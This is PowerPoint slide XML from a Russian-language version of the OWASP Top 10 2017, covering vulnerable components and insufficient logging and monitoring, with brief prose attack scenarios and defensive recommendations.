                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> и т. п. Следите за новостями об уязвимостях на соответствующих ресурсах, таких как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Используйте инструменты анализа состава ПО для автоматизации процесса. Подпишитесь на рассылки об уязвимостях, относящихся к используемым вами компонентам;</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загружайте компоненты из официальных источников по безопасным ссылкам. Отдавайте предпочтение подписанным пакетам для снижения риска установки измененного или вредоносного компонента;</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следите за библиотеками и компонентами, которые не поддерживаются или не получают обновлений безопасности. Если обновление не возможно, попробуйте использовать виртуальные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>патчи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> для обнаружения или предотвращения эксплуатации известных уязвимостей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Каждая организация должна обеспечить отслеживание, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>приоритизацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> и применение обновлений или изменений в конфигурации на протяжении всего жизненного цикла приложения или линейки приложений</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="750" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="750" dirty="0"/>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A9</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Использование компонентов с известными </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>уязвимостями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941795856"/>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Несмотря на простоту поиска уже готовых </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>эксплойтов</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> для большинства известных уязвимостей, некоторые из них требуют создания специальных средств для их эксплуатации.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Данная уязвимость является очень распространенной. Шаблоны для разработчиков, содержащие большое количество компонентов, могут привести к непониманию того, какие компоненты  реально используются в приложении или API. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Некоторые сканеры, такие как retire.js, могут помочь с обнаружением уязвимостей, но определение сложности их эксплуатации потребует дополнительных усилий.</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770" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Несмотря на то, что не все уязвимости приводят к серьезным последствиям, причиной некоторых масштабных взломов стали именно компоненты, содержащие известные уязвимости. В зависимости от защищаемых активов подобная угроза может оказаться на вершине вашего списка.</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1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36385" y="1061610"/>
            <a:ext cx="542925" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178750" y="1021600"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId23"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3113965" y="1061610"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499230" y="1176105"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId25"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858780" y="1511660"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11240" y="1505194"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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№1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Форум открытого проекта, используемый небольшой командой, был взломан через уязвимость в его ПО. Злоумышленники удалили внутренний </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>репозиторий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, содержащий следующую версию продукта, а также все содержимое форума. Несмотря на возможность восстановления источника, отсутствие мониторинга, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> или оповещений привело к более серьезным последствиям. Из-за инцидента программный проект с форума более не развивается.</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№2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Злоумышленник может использовать один стандартный пароль для проверки доступа ко всем учетным записям, к некоторым из них он может подойти. Для остальных будет зарегистрирована лишь неудачная попытка входа. Через несколько дней попытка может повториться, но уже с другим паролем.</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№3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: В крупной торговой сети имеется песочница для внутреннего анализа вредоносных вложений. Средства песочницы обнаружили потенциально вредоносное ПО, но никто не обращал внимания на получаемые от песочницы предупреждения, пока взлом не обнаружили в связи с мошенническими транзакциями по банковским картам от стороннего банка.</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Недостатки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, обнаружения атак, мониторинга и реагирования на инциденты выявляются постоянно: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подвергаемые аудиту события, такие как удачные и неудачные попытки входа в систему, а также важные транзакции, не регистрируются;</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предупреждения и ошибки не регистрируются или регистрируются некорректно;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журналы приложений и API не проверяются на предмет подозрительной активности;</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журналы хранятся только локально;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пороговые значения предупреждений и схемы реагирования на инциденты отсутствуют или являются неэффективными;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="78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тестирование на проникновение и сканирование инструментами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) не выдают предупреждений;</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приложение не может определять, реагировать или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>предупреждать об атаках в реальном или почти реальном времени.</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В системе имеется утечка данных, если журналы регистрации и предупреждения доступны пользователям или атакующим (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Разглашение конфиденциальных данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="78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7"/>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7"/>
              </a:rPr>
              <a:t> защита OWASP: Реализация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> и обнаружения вторжений</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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V8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Журналирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> и мониторинг</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Подробные коды ошибок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9"/>
              </a:rPr>
              <a:t>Памятка OWASP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>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9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">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0"/>
              </a:rPr>
              <a:t>CWE-223: Отсутствие регистрации или отображения данных, относящихся к безопасности</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1"/>
              </a:rPr>
              <a:t>CWE-778: Некорректное </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>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11"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU"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Исходя из критичности данных, хранимых или обрабатываемых приложением, необходимо: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регистрировать все ошибки входа, доступа и проверки данных на стороне сервера с указанием контекста, достаточного для выявления подозрительных или вредоносных действий, а также хранить их для последующего анализа;</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rPr>
              <a:t>регистрировать события в формате, наиболее подходящем для обработки централизованной службой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin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использовать контроль целостности журналов аудита важных транзакций для предотвращения подмены или удаления данных, например, с помощью доступных только для добавления таблиц БД;</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использовать эффективные системы мониторинга и предупреждения для своевременного обнаружения подозрительных действий и реагирования на них;</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разработать или утвердить руководство по реагированию на инциденты и устранению их последствий, такое как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>NIST 800-61 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>rev2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Существуют коммерческие и бесплатные системы защиты приложений (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), межсетевые экраны веб-приложений (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> с набором основных правил OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
